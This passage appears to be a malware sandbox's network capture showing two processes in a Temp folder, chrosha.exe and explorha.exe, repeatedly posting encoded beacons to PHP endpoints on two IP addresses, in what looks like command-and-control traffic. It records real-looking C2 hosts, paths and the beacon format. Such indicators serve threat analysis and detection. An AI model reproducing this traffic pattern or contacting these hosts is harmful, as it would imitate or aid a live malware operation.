Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:11.907391071 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
701 | 192.168.2.5 | 50547 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:11.908889055 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:12.155509949 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
702 | 192.168.2.5 | 50548 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:12.265556097 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:12.513118982 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
703 | 192.168.2.5 | 50549 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:12.510811090 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:12.757867098 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
704 | 192.168.2.5 | 50550 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:12.758456945 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:13.004904985 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
705 | 192.168.2.5 | 50551 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:13.000708103 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:13.245023012 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
706 | 192.168.2.5 | 50552 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:13.360433102 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:13.601059914 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
707 | 192.168.2.5 | 50553 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:13.600435972 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:13.845953941 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
708 | 192.168.2.5 | 50554 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:13.854491949 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:14.107292891 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
709 | 192.168.2.5 | 50556 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:14.097085953 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:14.357805014 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
710 | 192.168.2.5 | 50557 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:14.467315912 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:14.714122057 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
711 | 192.168.2.5 | 50558 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:14.710908890 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:14.957750082 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
712 | 192.168.2.5 | 50559 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:14.961406946 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:15.208961010 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
713 | 192.168.2.5 | 50560 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:15.210519075 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:15.464256048 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
714 | 192.168.2.5 | 50561 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:15.571472883 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:15.818169117 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
715 | 192.168.2.5 | 50562 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:15.819173098 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:16.063188076 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
716 | 192.168.2.5 | 50563 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:16.073565960 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:16.327847004 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
717 | 192.168.2.5 | 50564 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:16.314544916 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:16.561790943 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
718 | 192.168.2.5 | 50565 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:16.677108049 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:16.921678066 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
719 | 192.168.2.5 | 50566 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:16.909847021 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:17.152375937 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
720 | 192.168.2.5 | 50567 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:17.177627087 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:17.433527946 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
721 | 192.168.2.5 | 50568 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:17.406939983 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:17.662655115 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
